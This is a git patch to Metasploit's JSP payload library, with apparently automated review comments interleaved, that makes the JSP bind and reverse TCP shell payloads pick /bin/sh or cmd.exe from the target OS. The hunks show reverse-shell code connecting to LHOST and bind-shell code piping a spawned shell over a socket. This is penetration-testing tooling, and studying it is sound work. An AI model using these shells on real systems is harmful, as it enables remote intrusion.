From e1b6ee283f094e3d9b7de57ae5acaee29889ecbf Mon Sep 17 00:00:00 2001
From: jvazquez-r7
Date: Sat, 30 Aug 2014 16:27:02 -0500
Subject: [PATCH] Allow Msf::Payload::JSP to guess system shell path if it isnt provided
---
 lib/msf/core/payload/jsp.rb | 47 ++++++++++++++++++-
 .../singles/java/jsp_shell_bind_tcp.rb | 1 -
 .../singles/java/jsp_shell_reverse_tcp.rb | 1 -
 3 files changed, 45 insertions(+), 4 deletions(-)
diff --git a/lib/msf/core/payload/jsp.rb b/lib/msf/core/payload/jsp.rb
index 2a81902839..13dbbf2f1b 100644
--- a/lib/msf/core/payload/jsp.rb
+++ b/lib/msf/core/payload/jsp.rb
@@ -2,8 +2,23 @@
 require 'msf/core'
 require 'rex'
+# This module is chained within JSP payloads that target the Java platform.
+# It provides methods to generate Java / JSP code.
 module Msf::Payload::JSP
+
+ # @param attributes [Hash{Symbol => String,nil}]
+ def initialize(info = {})
+ ret = super(info)
+
+ register_options([
+ Msf::OptString.new( 'SHELL', [false, 'The system shell to use.'])
+ ], Msf::Payload::JSP )
+
+ ret
+ end
+
 # Outputs jsp that spawns a bind TCP shell
+ #
 # @return [String] jsp code that executes bind TCP payload
 def jsp_bind_tcp
 # Modified from: http://www.security.org.sg/code/jspreverse.html
@@ -53,10 +68,11 @@ module Msf::Payload::JSP
 try {
+ #{shell_path}
 ServerSocket server_socket = new ServerSocket( #{datastore['LPORT'].to_s} );
 Socket client_socket = server_socket.accept();
 server_socket.close();
- Process process = Runtime.getRuntime().exec( "#{datastore['SHELL']}" );
+ Process process = Runtime.getRuntime().exec( ShellPath );
 ( new StreamConnector( process.getInputStream(), client_socket.getOutputStream() ) ).start();
 ( new StreamConnector( client_socket.getInputStream(), process.getOutputStream() ) ).start();
 } catch( Exception e ) {}
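Review bot: The YARD tag on the new `initialize` documents a parameter named `attributes` that does not exist; the method takes `info`, so the line should read `# @param info [Hash{Symbol => String,nil}]`, and a `@return` tag would cover the `ret` value the method hands back. The SHELL option was previously registered by each payload module as required with a `'cmd.exe'` default and is now optional with no default, so its description should tell the operator what happens when it is left blank, e.g. `'The system shell to use (guessed from the target OS when unset).'`.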
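Review bot: The new `exec( ShellPath )` line keeps the single-String overload of `Runtime.exec`, which tokenizes its argument on whitespace before launching, so a SHELL value whose path contains a space is now handed over as a command plus arguments rather than one executable; the reverse-TCP hunk at `@@ -116,8 +133,9 @@` has the same line. Since `ShellPath` is already a standalone variable, the array overload avoids the split with no other change: `Process process = Runtime.getRuntime().exec( new String[] { ShellPath } );`. The interpolated `#{shell_path}` also introduces the Java local that the exec line depends on, with nothing in the Ruby tying the two together; a Ruby comment above the heredoc such as `# #{shell_path} declares the Java local ShellPath consumed by exec() below` would make that coupling explicit. The body of `jsp_bind_tcp` starts and ends outside this hunk.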
@@ -67,6 +83,7 @@ module Msf::Payload::JSP
 end
 # Outputs jsp code that spawns a reverse TCP shell
+ #
 # @return [String] jsp code that executes reverse TCP payload
 def jsp_reverse_tcp
 # JSP Reverse Shell modified from: http://www.security.org.sg/code/jspreverse.html
@@ -116,8 +133,9 @@ module Msf::Payload::JSP
 try {
+ #{shell_path}
 Socket socket = new Socket( "#{datastore['LHOST']}", #{datastore['LPORT'].to_s} );
- Process process = Runtime.getRuntime().exec( "#{datastore['SHELL']}" );
+ Process process = Runtime.getRuntime().exec( ShellPath );
 ( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();
 ( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();
 } catch( Exception e ) {}
@@ -127,6 +145,7 @@ module Msf::Payload::JSP
 end
 # Wraps the jsp payload into a war
+ #
 # @return [Rex::Zip::Jar] a war to execute the jsp payload
 def generate_war
 jsp_name = "#{Rex::Text.rand_text_alpha_lower(rand(8)+8)}.jsp"
@@ -151,4 +170,28 @@ module Msf::Payload::JSP
 zip
 end
+
+ # Outputs Java code to assign the system shell path to a variable.
+ #
+ # It uses the datastore if a value has been provided, otherwise
+ # tries to guess the system shell path bad on the os target.
+ #
+ # @return [String] the Java code.
+ def shell_path
+ if datastore['SHELL'] && !datastore['SHELL'].empty?
+ jsp = "String ShellPath = \"#{datastore['SHELL']}\";"
+ else
+ jsp = <<-EOS
+String ShellPath;
+if (System.getProperty("os.name").toLowerCase().indexOf("windows") == -1) {
+ ShellPath = new String("/bin/sh");
+} else {
+ ShellPath = new String("cmd.exe");
+}
+ EOS
+ end
+
+ jsp
+ end
+
 end
diff --git a/modules/payloads/singles/java/jsp_shell_bind_tcp.rb b/modules/payloads/singles/java/jsp_shell_bind_tcp.rb
index 087958f27d..629acf7909 100644
--- a/modules/payloads/singles/java/jsp_shell_bind_tcp.rb
+++ b/modules/payloads/singles/java/jsp_shell_bind_tcp.rb
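Review bot: In the first branch of `shell_path`, `datastore['SHELL']` is interpolated into a Java string literal verbatim, so a value containing a double quote or a backslash produces a JSP that does not compile; escape those two characters first, e.g. `shell = datastore['SHELL'].gsub(/["\\]/) { |c| "\\#{c}" }` and interpolate `shell` instead. The doc comment has a typo and a word-order slip: `# tries to guess the system shell path based on the target OS.` reads as intended. The `jsp = ...; jsp` pattern can drop the local and return the `if` expression directly, and `new String("/bin/sh")` in the generated Java is equivalent to the plain literal `"/bin/sh"`.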
@@ -31,7 +31,6 @@ module Metasploit3
 'Payload' => ''
 }
 ))
- register_options( [ OptString.new( 'SHELL', [ true, "The system shell to use.", 'cmd.exe' ]), ], self.class )
 end
diff --git a/modules/payloads/singles/java/jsp_shell_reverse_tcp.rb b/modules/payloads/singles/java/jsp_shell_reverse_tcp.rb
index dc3ecfb3d9..f7ca628690 100644
--- a/modules/payloads/singles/java/jsp_shell_reverse_tcp.rb
+++ b/modules/payloads/singles/java/jsp_shell_reverse_tcp.rb
@@ -31,7 +31,6 @@ module Metasploit3
 'Payload' => ''
 }
 ))
- register_options( [ OptString.new( 'SHELL', [ true, "The system shell to use.", 'cmd.exe' ]), ], self.class )
 end